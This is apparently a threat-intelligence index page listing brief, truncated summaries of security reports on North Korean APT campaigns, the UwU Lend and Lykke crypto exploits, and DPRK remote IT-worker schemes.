654 reports
ASEC reported that Kimsuky exploited CVE-2017-11882 in the MS Office Equation Editor to launch mshta and run a malicious script that distributed a keylogger. The script connected to an error.php page that displayed a fake "Not Found" message while downloa…
Google reports that North Korean government-backed actors have accounted for roughly one third of government-backed phishing activity targeting Brazil since 2020. The DPRK-linked targeting focused on Brazilian government entities and the aerospace, techno…
APT-C-55, also known as Kimsuky, Mystery Baby, Baby Coin, Smoke Screen, BabyShark, and Cobra Venom, used the RandomQuery campaign to deliver open-source RAT components. The report describes malicious HTML email attachments that release LNK files and decoy…
With $173 million in these pools, the attacker used a 40K ETH flash loan to exploit the system. The protocol was paused soon after the exploit and UwU Lend acknowledged the exploit through their official X handle. The exploit could have been avoided by de…
SlowMist analyzed the June 10, 2024 UwU Lend hack as a $19.3 million price oracle manipulation against the protocol's EVM lending pools. The attacker used Tornado Cash-funded flash loans and large CurveFinance swaps to suppress and then inflate sUSDE pric…
Kimsuky delivered an Android phishing malware package named 8.aab, analyzed with jadx and identified by hashes including SHA-256 3e397e929c92d5f4fd6040cedb2ac6233d37ef29e96085d29dda04acf30b8355. The report documents requested Android permissions and frame…
ASEC observed SmallTiger malware in attacks against South Korean defense contractors, automobile parts makers, and semiconductor manufacturers. The initial access vector was not identified, but the actor moved laterally inside company networks and abused …
The threat actor appears to set the attack targets in advance and distribute malware after continuously collecting relevant information. The malware that is launched through the above process is XenoRAT which can perform various malicious behaviors such a…
Lykke said it halted withdrawals after a June 4 exploit affecting Lykke UK and Lykke Corp AG, later estimating losses at more than $22 million. Blockchain researcher SomaXBT publicly alleged the breach on June 9 and accused the exchange of trying to conce…
Trend Micro's 2024 targeted-attack overview for Japan and nearby regional targets includes Void Imugi in its table of groups observed attacking Taiwan in 2023, listing Lazarus as an alias and noting worldwide historical targeting. The same article gives f…
UwuLend was drained of $19.4 million after an attacker manipulated fallback oracle pricing in a series of rapid transactions funded from Tornado Cash. The exploit used flash-loan-driven trades against Curve pool states, allowing borrowing at one sUSDe rat…
Resecurity summarizes U.S. charges against Christina Chapman and alleged co-conspirators who helped place overseas IT workers, many tied to North Korea, into remote jobs at more than 300 U.S. companies. The scheme used stolen or borrowed U.S. identities, …
Cyber threats such as phishing, malware, and ransomware have become more common, targeting both individual remote workers and the IT infrastructures of large organizations. The observed campaign in India reveals several prominent themes exploited in phish…
Kimsuky was assessed with high confidence as targeting a western European weapons-component manufacturer through spear-phishing emails using a General Dynamics job-description lure. The malicious attachment, Safety Manager JD (General Dynamics HR Division…
APT37/Reaper activity is tied to a malicious HWP document disguised as an eligibility form for humanities and social-sciences doctoral research support. The excerpt says the group is associated with espionage-focused targeting of government, military, lar…